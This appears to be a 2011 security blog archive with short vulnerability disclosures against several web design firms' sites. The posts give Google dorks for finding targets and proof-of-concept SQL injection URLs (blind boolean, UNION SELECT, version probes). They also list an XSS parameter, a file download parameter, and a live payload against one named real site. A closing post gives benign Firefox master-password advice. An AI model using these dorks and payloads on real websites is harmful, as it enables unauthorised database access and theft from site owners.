Saturday, April 30, 2011

PakCyber Web Design Multiple Vulnerabilities


Title : PakCyber Web Design Multiple Vulnerabilities
Found : by p0pc0rn
Vendor: http://pakcyber.com/
Dork : intext:"Powered By PakCyber"

Blind SQL Injection
-------------------

http://www.victim.com/site.php?article_id=[Blindey]
Eg:
http://www.victim.com/full_article_text.php?article_id=808 and 1=1 TRUE
http://www.victim.com/full_article_text.php?article_id=808 and 1=2 FALSE

http://www.victim2.com/site.php?cid=[Blindey]
Eg:
http://www.victim2.com/university.php?cid=8 or 1=1-- TRUE
http://www.victim2.com/university.php?cid=8 or 1=2-- FALSE



http://www.victim3.com/site.php?CatId=[Blindey]
Eg:
http://www.victim3.com/CategoryDetails.php?CatId=44 or 1=1-- TRUE
http://www.victim3.com/CategoryDetails.php?CatId=44 or 1=2-- FALSE

There are more parameters need to be checked out.High possibility there's a SQL Injection vulnerablity too

Cross Site Scripting
--------------------
http://www.victim.com/CategoryDetails.php?CatId=44&CatName=[XSS]

thanks,
#p0pc0rn#

Friday, April 15, 2011

ezeXs Web Design Vulnerable to SQL Injection


Title : ezeXs Web Design Vulnerable to SQL Injection
Web : http://www.ezexs.com/
By : p0pc0rn
Dork : intext:"Powered by ezexs.com"

Microsoft Access SQL Injection
------------------------------

http://site.com/[type].asp?[id]=[SQL]

Notes : All parameters are possible to be injected.

POC
---

http://site.com/product_detail.asp?Id=57 union select 1 from test.a
http://site.com/category.asp?Id=49 union select 1 from test.a



more out there.

thanks,
-p0pc0rn-

Site Developed by Magfiroh Vulnerable to SQL Injection


Title : Site Developed by Magfiroh Vulnerable to SQL Injection
Filetype : ColdFusion
Found by : p0pc0rn
Dork : inurl:".cfm?judul="

SQL
---

http://site.com/parameter.cfm?judul=[SQL]

POC
---

http://site.com/download_detail.cfm?judul=1'

Live Demo
---------

http://www.stiabinabanua.ac.id/download_detail.cfm?judul=30 UNION SELECT 1,2,version(),user(),5,6--



thanks,
-p0pc0rn-

Tuesday, April 5, 2011

eksi7 Web Design Vulnerable to Multiple SQL Injection


Title : eksi7 Web Design Vulnerable to Multiple SQL Injection
Vendor: http://www.eksi7.com
Found by : p0pc0rn
Dork :
inurl:"devam.asp?haber_id="
inurl:"kat_list.asp?kat_id="
intext:"tasarim ve programlama eksi7 web hizmetleri"
intext:"design and programming eksi7 web services"

MSSQL
-----
http://site.com/path/haber/devam.asp?haber_id=[MSSQL]

POC
---
http://site.com/v4/haber/devam.asp?haber_id=7927+and+1=@@version


JetDatabase
-----------
http://site.com/path/haber/devam.asp?haber_id=[SQL]
http://site.com/path/icerik/kat_list.asp?kat_id=[SQL]

POC
---
http://site.com/abana/haber/devam.asp?haber_id=460 UnIoN SelECt 1 from test.a
http://site.com/rozey/icerik/kat_list.asp?kat_id=7 unIoN SelEct 1 from test.a


thanks,
-p0pc0rn-

Monday, April 4, 2011

Autonics Corporation Websites Vulnerable to Remote File Download

Title : Autonics Corporation Websites Vulnerable to Remote File Download
Found by : p0pc0rn
Dork : inurl:"download.php?bo_code=data"

POC
---
http://site.com/board/download.php?bo_code=data&filename=[remote file download]

* -------------------------------------------------------------------------
* @Creator Psyche Lee
* @version 1.0
* @date 2007-11-22
* -------------------------------------------------------------------------
* Copyright 2007 by Psyche Lee
* -------------------------------------------------------------------------
****more****

thanks,
-p0pc0rn-

Sunday, April 3, 2011

Master Password in Firefox


Master Password in Firefox
--------------------------

Some of us maybe stored password for some sites in our browser.SO..
It's really important to set your master password in firefox browser
Why we need to set the master password?
This is because, if attacker physically access to our computer as example,they can check our stored passwords at

Tools > Options > Security > Saved Password > Show Password


Dangerous meh?!

What you need to do is simple, just set the master password

Tools > Options > Security > Master Password


and then each time someone attempt to see the saved password,firefox will ask for master password first. Same happen if someone trying to browse to your favourite website where you did stored password in browser,firefox will ask to put the master password first.


Have a try.

Thanks
-p0pc0rn-